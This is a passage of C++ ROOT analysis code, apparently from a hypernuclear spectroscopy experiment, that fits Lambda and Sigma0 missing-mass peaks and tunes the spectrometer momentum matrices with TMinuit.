ht->Fill(mm_Al1);
hal_15_2->Fill(mm_Al1); // NOV 30 2020 counts/0.15 MeV
hd->Fill(mm_Al1);
h_al2->Fill(mm_Al1); // NOV 16 2020 counts/0.25 MeV
hal_20_2->Fill(mm_Al1); // NOV 30 2020 counts/0.2 MeV
XFP_3 = XFP_3 * XFPr + XFPm;
XpFP_3 = XpFP_3 * XpFPr + XpFPm;
YFP_3 = YFP_3 * YFPr + YFPm;
YpFP_3 = YpFP_3 * YpFPr + YpFPm;
R_XFP_3 = R_XFP_3*XFPr +XFPm ;
R_XpFP_3 = R_XpFP_3*XpFPr+XpFPm;
R_YFP_3 = R_YFP_3*YFPr+ YFPm;
R_YpFP_3 = R_YpFP_3*YpFPr +YpFPm;
z_av_3[0] =z_av_3[0]*Ztr + Ztm;
tnew->Fill();
bool lambdaflag_3=false; // need adjustment for tune Jan_02
int peak_with_hit_3= -1;
for(int j=0; j<npeak_3; j++){
if(Lambda_cent_3[j]-Lambda_width_3[j]<mm_Al1 // mm_3 need to be adjusted for event selection
&&mm_Al1 < Lambda_cent_3[j]+Lambda_width_3[j]){
lambdaflag_3=true;
peak_with_hit_3=j;
}
else lambdaflag_3=false;
if(ntune_event_3<nmax_3 && lambdaflag_3==true){
foil_flag_3[ntune_event_3] = peak_with_hit_3;
p10_3[ntune_event_3] = par_ep_3[0];
p11_3[ntune_event_3] = par_ep_3[1];
p12_3[ntune_event_3] = par_ep_3[2];
p13_3[ntune_event_3] = par_k_3[0];
p14_3[ntune_event_3] = par_k_3[1];
p15_3[ntune_event_3] = par_k_3[2];
p16_3[ntune_event_3] = hallap_3;
x_3[ntune_event_3] = R_XFP_3; ////RHRS open these lines only when RHRS momentum matrix is tuning
y_3[ntune_event_3] = R_YFP_3;
xp_3[ntune_event_3] = R_XpFP_3;
yp_3[ntune_event_3] = R_YpFP_3;
// x_3[ntune_event_3] = XFP_3; ////LHRS open these lines only when LHRS momentum matrix is tuning
// y_3[ntune_event_3] = YFP_3;
// xp_3[ntune_event_3] = XpFP_3;
// yp_3[ntune_event_3] = YpFP_3;
z_recon_3[ntune_event_3] = z_av_1_3[0];
phir_3[ntune_event_3] =ph1_3[0];
phil_3[ntune_event_3] =ph2_3[0];
ntune_event_3++;
}
}//int j
}
}
tnew->Write();
// ))))))))))))))))))))))))))))))))))))))))) t3 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
// // HH data
TF1 *f1 = new TF1("f1","gaus",1112.65,1118.74);////1112.74,1118.64 --->With Al and 1112.38,1118.93
TF1 *f2 = new TF1("f2","gaus",1189.95,1195.15);//1189.75,1195.15 --->With Al and with out al 1189.71,1195.42
TCanvas* c2 = new TCanvas("c2","c2",600,600);
c2->cd();
h->Draw();
h->Fit("f1","MR+"); /// these 3 lines are closed on June 09, 2020 to remove the Gaussian fit
h->Fit("f2","MR+"); /// during the paper is already spread to Hall A collaboration
f1->Draw("same");
TLatex l;
l.SetTextSize(0.06);
l.SetTextFont(62);// time bold italic
l.DrawLatex(1126,200,Form("#Lambda"));
l.DrawLatex(1126,179,Form("#color[2]{Mean = %.6g MeV}",f1->GetParameter(1))); // closed on June 09, 2020
l.DrawLatex(1126,158,Form("#color[2]{ #sigma = %.4g MeV}",f1->GetParameter(2))); // while getting parameter from fit
l.DrawLatex(1164,116,Form("#Sigma^{0}"));
l.DrawLatex(1164,100,Form("#color[2]{Mean = %.6g MeV}",f2->GetParameter(1))); // closed on June 09, 2020
l.DrawLatex(1164,79,Form("#color[2]{ #sigma = %.4g MeV}",f2->GetParameter(2))); // while getting parameter from fit
///// H in tritium data H contamination ++++++++++++++++++++++++++++++++++++++++++++++++=
h_hbg->Scale(0.82/38.0);
TCanvas *c_h = new TCanvas("c_h","c_h", 600,600);
c_h->cd();
h_h->Draw();
h_hbg->Draw("E2 same");
h_hbg->SetFillStyle(3002);
h_hbg->SetMarkerStyle(28);
h_hbg->SetMarkerColor(kGreen);
h_hc0b->Scale(0.82/38.0);
TCanvas *ch_0 = new TCanvas("ch_0","ch_0", 600,600);
ch_0->cd();
h_hc0->Draw();
h_hc0b->Draw("E2 same");
h_hc0b->SetFillStyle(3002);
h_hc0b->SetMarkerStyle(28);
h_hc0b->SetMarkerColor(kGreen);
h_hc1b->Scale(0.82/38.0);
TCanvas *ch_1 = new TCanvas("ch_1","ch_1", 600,600);
ch_1->cd();
h_hc1->Draw();
h_hc1b->Draw("E2 same");
h_hc1b->SetFillStyle(3002);
h_hc1b->SetMarkerStyle(28);
h_hc1b->SetMarkerColor(kGreen);
////// up to here is tritium data for H kinematics to see the H contamination in the T gas(((((()()()()()()()()()()()()()(()()()(
//// For H data with T kinematics
TF1 *f1_2 = new TF1("f1_2","gaus",1112.52,1118.8);//1112.7,1118.76 june 15, 2021
TCanvas* c2_2 = new TCanvas("c2_2","c2_2",600,600);
c2_2->cd();
h_2->Draw();
h_2->Fit("f1_2","MR+");
TLatex l2;
l2.SetTextSize(0.06);
l2.SetTextFont(62);
l2.DrawLatex(1140,80,Form("#Lambda")); // when use the fitting
l2.DrawLatex(1140,60,Form("#color[2]{#sigma = %.6g}",f1_2->GetParameter(2)));
l2.DrawLatex(1140,70,Form("#color[2]{mean = %.6g}",f1_2->GetParameter(1)));
////0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000------------888888888
TF1 *ft2 = new TF1("ft2","gaus",-4.5686,-2.1805);
TF1 *f3 = new TF1("f3","gaus",19.4155,22.883);
TF1 *f4 = new TF1("f4","gaus",29.4463,31.8078);
HT_b ->Add(h20_b,h21_b,1.0,1.0);
HT_b->Scale(0.82/38.0);
TCanvas* cT = new TCanvas("cT","cT",600,600);
cT->cd();
HT->Add(h20,h21,1.0,1.0);
HT->Draw();
HT_b->Draw("E2 same"); // background
HT_b->SetFillStyle(3002);
HT_b->SetMarkerStyle(28);
HT_b->SetMarkerColor(kGreen);
////// counts /0.5 =========================================================================================
hb2->Add(hb,hb1,1.0,1.0);
hb2->Scale(0.82/38.0);
TF1 *f10 = new TF1("f10","gaus",-4.6245,-3.0746);
TF1 *f30 = new TF1("f30","gaus",29.183,31.3214);
TCanvas* c11 = new TCanvas("c11","c11",600,600);
c11->cd();
htt->Add(hh,ht,1.0,1.0);
htt->Draw();
hb2->Draw("E2 same"); // background
hb2->SetFillStyle(3002);
hb2->SetMarkerStyle(28);
hb2->SetMarkerColor(kGreen);
// /// counts / 0.25 MeV Al spectrum +++++++++++++++++++++++++
hb_al->Add(hb_al1,hb_al2,1.0,1.0);
hb_al->Scale(0.82/38.0);
TCanvas* c_al = new TCanvas("c_al","c_al",600,600);
c_al->cd();
h_al->Add(h_al1,h_al2,1.0,1.0);
h_al->Draw();
hb_al->Draw("E2 same"); // background
hb_al->SetFillStyle(3002);
hb_al->SetMarkerStyle(28);
hb_al->SetMarkerColor(kGreen);
hbal_20->Add(hbal_20_1,hbal_20_2,1.0,1.0);//NOV 30, 2020
hbal_20->Scale(0.82/38.0);
TCanvas* cal_20 = new TCanvas("cal_20","cal_20",600,600);
cal_20->cd();
hal_20->Add(hal_20_1,hal_20_2,1.0,1.0);
hal_20->Draw();
hbal_20->Draw("E2 same"); // background
hbal_20->SetFillStyle(3002);
hbal_20->SetMarkerStyle(28);
hbal_20->SetMarkerColor(kGreen);
////0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
hbal_15->Add(hbal_15_1,hbal_15_2,1.0,1.0); //NOV 30, 2020
hbal_15->Scale(0.82/38.0);
TCanvas* cal_15 = new TCanvas("cal_15","cal_15",600,600);
cal_15->cd();
hal_15->Add(hal_15_1,hal_15_2,1.0,1.0);
hal_15->Draw();
hbal_15->Draw("E2 same"); // background
hbal_15->SetFillStyle(3002);
hbal_15->SetMarkerStyle(28);
hbal_15->SetMarkerColor(kGreen);
TF1 *f6 = new TF1("f6","gaus",-4.93,-2.582);
TF1 *f5 = new TF1("f5","gaus",4.499,6.8395);
TF1 *f7 = new TF1("f7","gaus",19.4075,20.6485);
TF1 *f8 = new TF1("f8","gaus",29.9542,31.1404);
hb7->Add(hb5,hb6,1.0,1.0);
hb7->Scale(0.82/38.0);
TCanvas* cf = new TCanvas("cf","cf",600,600);
cf->cd();
hf->Add(hd,he,1.0,1.0);
hf->Draw();
f5->SetLineWidth(1);
f6->SetLineWidth(1);
f7->SetLineWidth(1);
f8->SetLineWidth(1);
hb7->Draw("E2 same"); // background
hb7->SetFillStyle(3002);
hb7->SetMarkerStyle(28);
hb7->SetMarkerColor(kGreen);
////000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000---------------------8888888
h50b ->Scale(0.82/38.0);
TH1F * h50b1 = (TH1F*)h50b->Clone();
TCanvas* c50 = new TCanvas("c50","c50",600,600);
c50->cd();
h50->Draw();
h50b1->Draw("E2 same");
h50b1->SetFillStyle(3002);
h50b1->SetMarkerStyle(28);
h50b1->SetMarkerColor(kGreen);
h1_qb1 ->Scale(0.82/38.0);
TCanvas* c_q1 = new TCanvas("c_q1","c_q1",600,600);
c_q1->cd();
h1_q1->Draw();
h1_qb1->Draw("E2 same");
h1_qb1->SetFillStyle(3002);
h1_qb1->SetMarkerStyle(28);
h1_qb1->SetMarkerColor(kGreen);
//////// up to here is the quasi frre shape calculation ///////////////////////////////////////////////////////////
h1_2b->Scale(0.82/38.0);
TCanvas *c1_2 = new TCanvas("c1_2","c1_2", 600,600);
c1_2->cd();
h1_2->Draw();
h1_2b->Draw("E2 same");
h1_2b->SetFillStyle(3002);
h1_2b->SetMarkerStyle(28);
h1_2b->SetMarkerColor(kGreen);
//////////&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%$$$$$$$$$$$ Dec 01, 2020 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
h1_01b->Scale(0.82/38.0);
TCanvas *c1_01 = new TCanvas("c1_01","c1_01", 600,600);
c1_01->cd();
h1_01->Draw();
h1_01b->Draw("E2 same");
h1_01b->SetFillStyle(3002);
h1_01b->SetMarkerStyle(28);
h1_01b->SetMarkerColor(kGreen);
h1b_may->Scale(0.82/38.0);
TCanvas *c1_may = new TCanvas("c1_may","c1_may", 600,600);
c1_may->cd();
h1_may->Draw();
h1b_may->Draw("E2 same");
h1b_may->SetFillStyle(3002);
h1b_may->SetMarkerStyle(28);
h1b_may->SetMarkerColor(kGreen);
h1_02b->Scale(0.82/38.0);
TCanvas *c1_02 = new TCanvas("c1_02","c1_02", 600,600);
c1_02->cd();
h1_02->Draw();
h1_02b->Draw("E2 same");
h1_02b->SetFillStyle(3002);
h1_02b->SetMarkerStyle(28);
h1_02b->SetMarkerColor(kGreen);
h1_03b->Scale(0.82/38.0);
TCanvas *c1_03 = new TCanvas("c1_03","c1_03", 600,600);
c1_03->cd();
h1_03->Draw();
h1_03b->Draw("E2 same");
h1_03b->SetFillStyle(3002);
h1_03b->SetMarkerStyle(28);
h1_03b->SetMarkerColor(kGreen);
h125_6b->Scale(0.82/38.0);
TCanvas *c125_6 = new TCanvas("c125_6","c125_6", 600,600);
c125_6->cd();
h125_6->Draw();
h125_6b->Draw("E2 same");
h125_6b->SetFillStyle(3002);
h125_6b->SetMarkerStyle(28);
h125_6b->SetMarkerColor(kGreen);
//////////&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%$$$$$$$$$$$ Dec 01, 2020 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
// h25_2b->Scale(0.82/38.0);
// TCanvas *c25_2 = new TCanvas("c25_2","c25_2", 600,600);
// c25_2->cd();
// h25_2->Draw();
// h25_2b->Draw("E2 same");
// h25_2b->SetFillStyle(3002);
// h25_2b->SetMarkerStyle(28);
// h25_2b->SetMarkerColor(kGreen);
//////////&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%$$$$$$$$$$$ Dec 01, 2020 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
TFile* f_new = new TFile("./output_root/SEPT17_a1LT180_a2_1550_8000.root","recreate"); // also open the f_new->Close(); aslo
h->Write();
h_2->Write();
hf->Write();
hb7->Write();
hal_20->Write();
hbal_20->Write();
HT->Write();
HT_b->Write();
hal_15->Write();
hbal_15->Write();
htt->Write();
hb2->Write();
h_al->Write();
hb_al->Write();
h125_6->Write();
h125_6b->Write();
h1_q1->Write();
h1_qb1->Write();
h25_2->Write();
h25_2b->Write();
h1_03->Write();
h1_03b->Write();
h1_2->Write();
h1_2b->Write();
h1_01->Write();
h1_01b->Write();
h1_may->Write();
h1b_may->Write();
f_new->Close();
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++
const int nite =0;
double temp[nite];
double x[nite];
if (nite>0) cout << " Tuning started: " << endl;
for(int i=0 ; i<nite ; i++){
x[i] = i+1;
// temp[i] = tune(momL_opt,i); /// open when LHRS mom matrix is tuned
temp[i] = tune(momR_opt,i); /// open when RHRS mom matrix is tuned
sprintf(tempc, "./MOM_MATRICES/RMOM5_July8_1st_%d.dat",i); // output matrix
ofstream * ofs = new ofstream(tempc);
int nppp = 0;
const int nn = 5; // 5 for 5th order 4 for 4th order jan 31
for(int i=0; i<nn+1; i++){
for(int e=0; e<nn+1; e++){
for(int d=0; d<nn+1; d++){
for(int c=0; c<nn+1; c++){
for(int b=0; b<nn+1; b++){
for(int a=0; a<nn+1; a++){
if(a+b+c+d+e==i){
*ofs <<momR_opt[nppp] // MomR_opt[] for RHRS tune and MomL_opt[] for LHRS tune
<< " " << a
<< " " << b
<< " " << c
<< " " << d
<< " " << e << endl;
nppp++;
}
}
}
}
}
}
}
ofs->close();
ofs->clear();
cout << temp[i]<<endl;
}
if(nite>0){
TGraph * gr = new TGraph(nite,x,temp);
TCanvas * c4 = new TCanvas("c4","",600,600);
gr->Draw("*la");
}
} //end of main function
//////////////////////////////////////////////////
double calcf2t_th(double* P, double xf, double xpf,
double yf, double ypf,double zt)
//////////////////////////////////////////////////
{ // -----4th order -----
const int nMatT=4;
const int nXf=4;
const int nXpf=4;
const int nYf=4;
const int nYpf=4;
const int nZt=4;
double Y=0.;
double x=1.;
int npar=0;
int a=0,b=0,c=0,d=0,e=0;
for (int n=0;n<nMatT+1;n++){
for(e=0;e<n+1;e++){
for (d=0;d<n+1;d++){
for (c=0;c<n+1;c++){
for (b=0;b<n+1;b++){
for (a=0;a<n+1;a++){
if (a+b+c+d+e==n){
if (a<=nXf && b<=nXpf && c<=nYf && d<=nYpf && e<=nZt){
x = pow(xf,double(a))*pow(xpf,double(b))*
pow(yf,double(c))*pow(ypf,double(d))*pow(zt,double(e));
}
else{
x = 0.;
}
Y += x*P[npar];
npar++;
}
}
}
}
}
}
}// n =
return Y;
}
// ////////////////////////////////////////////////
//////////////////////////////////////////////////
double calcf2t_ph(double* P, double xf, double xpf,
double yf, double ypf, double zt)
//////////////////////////////////////////////////
{ // -----4th order -----
const int nMatT=4;
const int nXf=4;
const int nXpf=4;
const int nYf=4;
const int nYpf=4;
const int nZt=4;
double Y=0.;
double x=1.;
int npar=0;
int a=0,b=0,c=0,d=0,e=0;
for (int n=0;n<nMatT+1;n++){
for(e=0;e<n+1;e++){
for (d=0;d<n+1;d++){
for (c=0;c<n+1;c++){
for (b=0;b<n+1;b++){
for (a=0;a<n+1;a++){
if (a+b+c+d+e==n){
if (a<=nXf && b<=nXpf && c<=nYf && d<=nYpf && e<=nZt){
x = pow(xf,double(a))*pow(xpf,double(b))*
pow(yf,double(c))*pow(ypf,double(d))*pow(zt,double(e));
}
else{
x = 0.;
}
Y += x*P[npar];
npar++;
}
}
}
}
}
}
}// n =
return Y;
}
//////////////////////////////////////////////////
double calcf2t_mom(double* P, double xf, double xpf,
double yf, double ypf, double zt)
//////////////////////////////////////////////////
{ // -----5th order -----
const int nMatT=5;
const int nXf=5;
const int nXpf=5;
const int nYf=5;
const int nYpf=5;
const int nZt=5;
double Y=0.;
double x=1.;
int npar=0;
int a=0,b=0,c=0,d=0,e=0;
for (int n=0;n<nMatT+1;n++){
for(e=0;e<n+1;e++){
for (d=0;d<n+1;d++){
for (c=0;c<n+1;c++){
for (b=0;b<n+1;b++){
for (a=0;a<n+1;a++){
if (a+b+c+d+e==n){
if (a<=nXf && b<=nXpf && c<=nYf && d<=nYpf && e<=nZt){
x = pow(xf,double(a))*pow(xpf,double(b))*
pow(yf,double(c))*pow(ypf,double(d))*pow(zt,double(e));
}
else{
}
Y += x*P[npar];
npar++;
}
}
}
}
}
}
}// n =
return Y;
}
// missing mass function definition====================
double CalcMM(double ee, double* pvec_ep, double* pvec_k, double mt){ // Dec 3,2019
double pe = ee;
double Ee = sqrt(me*me + pe*pe);
Ee = Ee - 0.000125; // GeV /// 0.000163;
TVector3 vec_e (0.0, 0.0, pe);
double pep = pvec_ep[0];
double xpep = pvec_ep[1];
double ypep = pvec_ep[2];
double px_ep, py_ep, pz_ep;
pz_ep = pep / sqrt(1.0 + xpep*xpep + ypep*ypep);
px_ep = xpep * pz_ep;
py_ep = ypep * pz_ep;
TVector3 vec_ep (px_ep, py_ep, pz_ep);
vec_ep.RotateX(hrs_ang);
double Eep = sqrt(pep*pep + me*me);
double pk = pvec_k[0];
double xpk = pvec_k[1];
double ypk = pvec_k[2];
double px_k, py_k, pz_k;
pz_k = pk / sqrt(1.0 + xpk*xpk + ypk*ypk);
px_k = xpk * pz_k;
py_k = ypk * pz_k;
TVector3 vec_k (px_k, py_k, pz_k);
vec_k.RotateX(-hrs_ang);
double Ek = sqrt(pk*pk + mk*mk);
double missingE2 = 0.0, missingP2 = 0.0, missingM2 = 0.0;
missingE2 = pow(Ee + mt - Ek - Eep, 2.0);
missingP2 = (vec_e - vec_ep - vec_k) * (vec_e - vec_ep - vec_k);
missingM2 = missingE2 - missingP2;
double MissingMass = 0.0;
MissingMass = sqrt(missingM2);
return MissingMass;
}
//############### up to hear missing mass #####################
// #############################################################
double tune(double* pa, int j) // tune fun defn
// #############################################################
{
double chi2 = 0.0;
double arglist[10];
int ierflg = 0;
int allparam =Mom_Par; // for momentum tune jan 31
TMinuit* minuit = new TMinuit(allparam);
minuit->SetFCN(fcn); // very imp function setying for chi square
// ~~~ Chi-square ~~~~
arglist[0] = 1;
minuit -> mnexcm("SET ERR",arglist,1,ierflg);
minuit -> SetPrintLevel(-1);
double start[allparam];
double step[allparam];
double LLim[allparam];
double ULim[allparam];
char pname[500];
for(int i=0 ; i<allparam ; i++){
sprintf(pname,"param_%d",i+1);
start[i] = pa[i];
// step[i] = 1.0e-3; /// Original
step[i] = 2.0*0.5; // for rough matrix, when matrix is far from reality
LLim[i] = pa[i] -10; // pa[i]*0.8; // KI
ULim[i] = pa[i] + 10; //pa[i]*0.8; // KI
// LLim[i] = pa[i] - pa[i]*0.8; // KI
// ULim[i] = pa[i] + pa[i]*0.8; // KI
minuit -> mnparm(i,pname,start[i],step[i],LLim[i],ULim[i],ierflg);
}
// ~~~~ Strategy ~~~~
// arglist[0] = 2.0; // was active before
arglist[0] = 1.0; // KI
minuit->mnexcm("SET STR",arglist,1,ierflg);
// ~~~~ Migrad + Simplex ~~~~ one of the way to get optimized parameter
arglist[0] = 20000;
arglist[1] = 0.01; // To make more presise
minuit -> mnexcm("MINImize",arglist,2,ierflg);
double amin,edm,errdef;
int nvpar,nparx,icstat;
double er;
minuit -> mnstat(amin,edm,errdef,nvpar,nparx,icstat);
minuit -> mnprin(0,amin);
if(amin>0) chi2=amin;
for(int i=0 ; i<allparam ; i++){
// / minuit -> GetParameter(i,momL_opt[i],er); // open this line only when LHRS momentum matrix is tuned
minuit -> GetParameter(i,momR_opt[i],er); // open this line only when RHRS momentum matrix is tuned
}
return chi2;
}
// #############################################################
void fcn(int &nPar, double* /*grad*/, double &fval, double* param, int /*iflag*/)
// #############################################################
{
double chi2 = 0.0;
double chi_12 = 0.0;
double XFP, XpFP;
double YFP, YpFP;
const double sigma = 0.0045;
double ref_mm = 0.0;
double residual = 0.0;
double par_ep[3];
double par_k[3];
double halla_p;
double momr[100];
double moml[100];
double z_av;
double z_av_sc;
double rvz;
double ph1;
double th1;
double ph2;
double th2;
double delta_pk[100];
double delta_pep[100];
double pk_real[100];
double pep_real[100];
double MM;
double THL;
double PHL;
double THR;
double PHR;
// (((((((((((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((
double chi_22 = 0.0;
double XFP_2, XpFP_2;
double YFP_2, YpFP_2;
double ref_mm_2 = 0.0;
double residual_2 = 0.0;
double par_ep_2[3];
double par_k_2[3];
double halla_p_2;
double momr_2[100];
double moml_2[100];
double z_av_2;
double z_av_sc_2;
double ph1_2;
double th1_2;
double ph2_2;
double th2_2;
double delta_pk_2[100];
double delta_pep_2[100];
double pk_real_2[100];
double pep_real_2[100];
double MM_2;
double THL_2;
double PHL_2;
double THR_2;
double PHR_2;
//))))))))))))))))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((((((((((( t3 (((((((((((((((((((((((((((((((((
double chi_33 = 0.0;
double XFP_3, XpFP_3;
double YFP_3, YpFP_3;
double ref_mm_3 = 0.0;
double residual_3 = 0.0;
double par_ep_3[3];
double par_k_3[3];
double halla_p_3;
double momr_3[100];
double moml_3[100];
double z_av_3;
double z_av_sc_3;
double ph1_3;
double th1_3;
double ph2_3;
double th2_3;
double delta_pk_3[100];
double delta_pep_3[100];
double pk_real_3[100];
double pep_real_3[100];
double MM_3;
double THL_3;
double PHL_3;
double THR_3;
double PHR_3;
//))))))))))))))))))))))))))))))))))))))))))))) t3 ))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((((((((((( to include the Al/HT data for tune Jan 07, 2020 (((((((((((((((((((((((((((((((((
double chi_44 = 0.0;
double XFP_4, XpFP_4;
double YFP_4, YpFP_4;
double ref_mm_4 = 0.0;
double residual_4 = 0.0;
double par_ep_4[3];
double par_k_4[3];
double halla_p_4;
double momr_4[100];
double moml_4[100];
double z_av_4;
double z_av_sc_4;
double ph1_4;
double th1_4;
double ph2_4;
double th2_4;
double delta_pk_4[100];
double delta_pep_4[100];
double pk_real_4[100];
double pep_real_4[100];
double MM_4;
double THL_4;
double PHL_4;
double THR_4;
double PHR_4;
//))))))))))))))))))))))))))))))))))))))))))))) up here is _4 ))))))))))))))))))))))))))))
for(int i=0; i<ntune_event; i++){
residual = 0.0;
ref_mm = 0.0;
ref_mm = Lambda_real[foil_flag[i]];
ref_mm = ref_mm/1000.0;
XFP = x[i];
XpFP = xp[i];
YFP = y[i];
YpFP = yp[i];
z_av = z_recon[i];
ph1 = phir[i]; // open when calibrate the Momentum
ph1= -ph1;
ph2 = phil[i];
ph2 = -ph2;
XFP =(XFP -XFPm)/XFPr;
XpFP =(XpFP-XpFPm)/XpFPr;
YFP =(YFP -YFPm)/YFPr;
YpFP =(YpFP-YpFPm)/YpFPr;
z_av_sc = (z_av - Ztm)/Ztr;
// For the LHRS momentum tunning
moml[0] = calcf2t_mom(param, XFP, XpFP, YFP, YpFP, z_av_sc);
moml[0] = moml[0]*Momr+Momm;
double hang;
if( z_av<8.0e-2){
hang = ph2 + hrs_ang;
hang = -hang;
delta_pep[0] = -1.35758*sin(-4.59571* hang) + 2.09093;
}
else{
hang = ph2 + hrs_ang;
hang = -hang;
delta_pep[0] = 6.23409e-3*hang + 4.03363e-1;
}
pep_real[0] = moml[0] + delta_pep[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep[0] = pep_real[0];// When LHRS momentum tuned keep this line open otherwise comment it
par_ep[0] = p10[i];// comment this line if the previous line is open or not commented
par_ep[1] = p11[i];
par_ep[2] = p12[i];
// for the RHRS momentum tunning
momr[0] = calcf2t_mom(param, XFP, XpFP, YFP, YpFP, z_av_sc);
momr[0] = momr[0]*Momr+Momm;
double hang1;
if(z_av<8.0e-2){
hang1= ph1 - hrs_ang;
delta_pk[0] =-1.31749*sin(-4.61513* hang1) + 2.03687;
}
else{
hang1= ph1 - hrs_ang;
delta_pk[0] = 3.158e-2*hang1 + 4.05819e-1;
}
pk_real[0] = momr[0] + delta_pk[0]/1000.0;
par_k[0] = pk_real[0];// open this line only when RHRS momentum matrix tuned and the next line closed
// par_k[0] = p13[i]; // if previous line is open (not commented), comment this line
par_k[1] = p14[i]; // jan 31
par_k[2] = p15[i];
halla_p = p16[i];
MM = CalcMM(halla_p, par_ep, par_k, mp);
residual = MM-ref_mm;
// chi_12 = chi_12 + pow(residual,2.0);
/////// if need to use the sigma statistical weigh
if(foil_flag[i] ==0)
{chi_12 = chi_12 +6*pow(residual,2.0);}
else
{chi_12 = chi_12 +10*pow(residual,2.0);}
}
// (((((((((((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((
for(int i=0; i<ntune_event_2; i++){
residual_2 = 0.0;
ref_mm_2 = 0.0;
ref_mm_2 = Lambda_real_2[foil_flag_2[i]];
ref_mm_2 = ref_mm_2/1000.0;
XFP_2 = x_2[i];
XpFP_2 = xp_2[i];
YFP_2 = y_2[i];
YpFP_2 = yp_2[i];
z_av_2 = z_recon_2[i];
ph1_2 = phir_2[i]; // open when calibrate the Momentum
ph1_2 = - ph1_2;
ph2_2 = phil_2[i];
ph2_2 = - ph2_2;
XFP_2 =(XFP_2 -XFPm)/XFPr;
XpFP_2 =(XpFP_2-XpFPm)/XpFPr;
YFP_2 =(YFP_2 -YFPm)/YFPr;
YpFP_2 =(YpFP_2-YpFPm)/YpFPr;
z_av_sc_2 = (z_av_2 - Ztm)/Ztr;
// For the LHRS momentum tunning
moml_2[0] = calcf2t_mom(param, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_sc_2);
moml_2[0] = moml_2[0]*Momr+Momm;
moml_2[0] = moml_2[0]*2.217925/2.1; //for H/T and tritium only
double hang2;
if( z_av_2<8.0e-2){
hang2 = ph2_2 + hrs_ang;
hang2 = -hang2;
delta_pep_2[0] = -1.35758*sin(-4.59571* hang2) + 2.09093;
}
else{
hang2 = ph2_2 + hrs_ang;
hang2 = -hang2;
delta_pep_2[0] = 6.23409e-3*hang2 + 4.03363e-1;
}
pep_real_2[0] = moml_2[0] + delta_pep_2[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep_2[0] = pep_real_2[0];// Wwhen LHRS momentum tuned, uncoment this line
par_ep_2[0] = p10_2[i];
par_ep_2[1] = p11_2[i];
par_ep_2[2] = p12_2[i];
// for the RHRS momentum tunning
momr_2[0] = calcf2t_mom(param, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_sc_2);
momr_2[0] = momr_2[0]*Momr+Momm;
double hang3;
if(z_av_2<8.0e-2){
hang3 = ph1_2 - hrs_ang;
delta_pk_2[0] =-1.31749*sin(-4.61513* hang3) + 2.03687;
}
else{
hang3 = ph1_2 - hrs_ang;
delta_pk_2[0] = 3.158e-2*hang3 + 4.05819e-1;
}
pk_real_2[0] = momr_2[0] + delta_pk_2[0]/1000.0;
par_k_2[0] = pk_real_2[0];// when RHRS matrix tuned
// par_k_2[0] = p13_2[i];
par_k_2[1] = p14_2[i]; // jan 31
par_k_2[2] = p15_2[i];
halla_p_2 = p16_2[i];
MM_2 = CalcMM(halla_p_2, par_ep_2, par_k_2, mp);
residual_2 = MM_2-ref_mm_2;
chi_22 = chi_22 +25*pow(residual_2,2.0);
// chi_22 = chi_22 +pow(residual_2,2.0);
}
//))))))))))))))))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((((((((((( t3 T/T data for Al ((((((((((((((((((((((((((((((
for(int i=0; i<ntune_event_3; i++){
residual_3 = 0.0;
ref_mm_3 = 0.0;
ref_mm_3 = Lambda_real_3[foil_flag_3[i]];
ref_mm_3 = ref_mm_3/1000.0;
XFP_3 = x_3[i];
XpFP_3 = xp_3[i];
YFP_3 = y_3[i];
YpFP_3 = yp_3[i];
z_av_3 = z_recon_3[i];
ph1_3 = phir_3[i]; // open when calibrate the Momentum
ph1_3 = - ph1_3;
ph2_3 = phil_3[i];
ph2_3 = - ph2_3;
XFP_3 =(XFP_3 -XFPm)/XFPr;
XpFP_3 =(XpFP_3-XpFPm)/XpFPr;
YFP_3 =(YFP_3 -YFPm)/YFPr;
YpFP_3 =(YpFP_3-YpFPm)/YpFPr;
z_av_sc_3 = (z_av_3 - Ztm)/Ztr;
// For the LHRS momentum tunning
moml_3[0] = calcf2t_mom(param, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_sc_3);
moml_3[0] = moml_3[0]*Momr+Momm;
moml_3[0] = moml_3[0]*2.217925/2.1; //for H/T and tritium only
double hang9;
if( z_av_3<8.0e-2){
hang9 = ph2_3 + hrs_ang;
hang9 = -hang9;
delta_pep_3[0] = -1.35758*sin(-4.59571* hang9) + 2.09093;
delta_pep_3[0] = delta_pep_3[0] + 0.0524; /// may 07, 2021************
}
else{
hang9 = ph2_3 + hrs_ang;
hang9 = -hang9;
// delta_pep_3[0] = 6.23409e-3*hang9 + 4.03363e-1;
delta_pep_3[0] = 0.3027;/// may 07, 2021************
}
pep_real_3[0] = moml_3[0] + delta_pep_3[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep_3[0] = pep_real_3[0];// Wwhen LHRS momentum tuned, uncoment this line
par_ep_3[0] = p10_3[i];
par_ep_3[1] = p11_3[i];
par_ep_3[2] = p12_3[i];
// for the RHRS momentum tunning
momr_3[0] = calcf2t_mom(param, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_sc_3);
momr_3[0] = momr_3[0]*Momr+Momm;
double hang10;
if(z_av_3<8.0e-2){
hang10 = ph1_3 - hrs_ang;
delta_pk_3[0] =-1.31749*sin(-4.61513* hang10) + 2.03687;
delta_pk_3[0] = delta_pk_3[0] + 0.0512; /// may 07, 2021************
}
else{
hang10 = ph1_3 - hrs_ang;
